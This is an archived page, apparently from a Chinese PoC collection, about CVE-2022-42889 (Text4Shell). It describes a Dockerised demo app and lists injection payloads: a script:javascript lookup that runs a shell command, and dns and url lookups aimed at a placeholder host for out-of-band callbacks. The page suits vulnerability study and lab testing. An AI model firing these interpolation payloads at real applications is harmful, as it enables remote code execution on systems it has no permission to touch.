关联漏洞
标题:Apache Commons Text 代码注入漏洞 (CVE-2022-42889)Description:Apache Commons Text是美国阿帕奇(Apache)基金会的一个专注于字符串算法的库。 Apache Commons Text 1.5至1.9版本存在安全漏洞,该漏洞源于默认的Lookup实例集包括可能导致任意代码执行或与远程服务器联系的插值器,可能容易受到远程代码执行或与远程服务器的无意接触的影响。
Description
docker for CVE-2022-42889
介绍
# CVE-2022-42889-POC
A simple demo application that shows how to exploit the CVE-2022-42889 vulnerability.
Utilizes OOB (Out of Band) services to demonstrate dns and url prefixes.
JavaDocs for commons-text interpolation [commons-text JavaDocs](https://commons.apache.org/proper/commons-text/javadocs/api-release/org/apache/commons/text/StringSubstitutor.html)
Example interpolations
* script:javascript ("${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/blop')}")
* dns ("${dns:address|HOST}")
* url ("${url:UTF-8:http://HOST")
Quote from Rapid7
>The vulnerability has been compared to Log4Shell since it is an open-source library-level vulnerability that is likely to impact a wide variety of software applications that use the relevant object.
>However, initial analysis indicates that this is a bad comparison. The nature of the vulnerability means that unlike Log4Shell, it will be rare that an application uses the vulnerable component of Commons Text to process untrusted, potentially malicious input.
# Prerequisites
* docker
* java
* maven
Java and maven can be skipped if one fetch image from [Docker Hub](https://hub.docker.com/r/korteke/text4shell)
# Usage
Build application
```
mvn clean package
```
Build docker image
```
docker build -t cve-2022-42889-poc .
```
Run docker image
```
docker run --rm -p 8081:8081 -t cve-2022-42889-poc
```
Access application and follow instructions
```
open http://localhost:8081
```
### More information
* [NIST NVD](https://nvd.nist.gov/vuln/detail/CVE-2022-42889)
* [Rapid 7](https://www.rapid7.com/blog/post/2022/10/17/cve-2022-42889-keep-calm-and-stop-saying-4shell/)
文件快照
[4.0K] /data/pocs/705236531395bedc83a34351bc2902068f6d4495
├── [ 131] Dockerfile
├── [4.0K] images
│ ├── [205K] cve-2022-42889-interactsh.png
│ └── [101K] cve-2022-42889-main.png
├── [1.2M] mask_cnn.ipynb
├── [ 10K] mvnw
├── [6.6K] mvnw.cmd
├── [2.5K] pom.xml
├── [1.6K] README.md
├── [4.0K] src
│ ├── [4.0K] main
│ │ ├── [4.0K] java
│ │ │ └── [4.0K] net
│ │ │ └── [4.0K] kvak
│ │ │ └── [4.0K] text4shell
│ │ │ ├── [4.0K] controller
│ │ │ │ ├── [ 273] HomeController.java
│ │ │ │ └── [ 772] TempExploit.java
│ │ │ └── [ 332] Text4shellApplication.java
│ │ └── [4.0K] resources
│ │ ├── [ 47] application.properties
│ │ └── [4.0K] templates
│ │ ├── [ 748] home.html
│ │ └── [ 341] result.html
│ └── [4.0K] test
│ └── [4.0K] java
│ └── [4.0K] net
│ └── [4.0K] kvak
│ └── [4.0K] text4shell
│ └── [ 224] Text4shellApplicationTests.java
├── [4.0K] target
│ ├── [4.0K] classes
│ │ ├── [ 47] application.properties
│ │ ├── [4.0K] net
│ │ │ └── [4.0K] kvak
│ │ │ └── [4.0K] text4shell
│ │ │ ├── [4.0K] controller
│ │ │ │ ├── [ 594] HomeController.class
│ │ │ │ └── [1.7K] TempExploit.class
│ │ │ └── [ 757] Text4shellApplication.class
│ │ └── [4.0K] templates
│ │ ├── [ 748] home.html
│ │ └── [ 341] result.html
│ ├── [4.0K] maven-archiver
│ │ └── [ 62] pom.properties
│ ├── [4.0K] maven-status
│ │ └── [4.0K] maven-compiler-plugin
│ │ ├── [4.0K] compile
│ │ │ └── [4.0K] default-compile
│ │ │ ├── [ 149] createdFiles.lst
│ │ │ └── [ 356] inputFiles.lst
│ │ └── [4.0K] testCompile
│ │ └── [4.0K] default-testCompile
│ │ ├── [ 53] createdFiles.lst
│ │ └── [ 122] inputFiles.lst
│ ├── [4.0K] surefire-reports
│ │ ├── [ 341] net.kvak.text4shell.Text4shellApplicationTests.txt
│ │ └── [ 19K] TEST-net.kvak.text4shell.Text4shellApplicationTests.xml
│ ├── [4.0K] test-classes
│ │ └── [4.0K] net
│ │ └── [4.0K] kvak
│ │ └── [4.0K] text4shell
│ │ └── [ 555] Text4shellApplicationTests.class
│ ├── [ 19M] text4shell-0.0.1-SNAPSHOT.jar
│ └── [5.4K] text4shell-0.0.1-SNAPSHOT.jar.original
└── [ 628] test.py
34 directories, 32 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。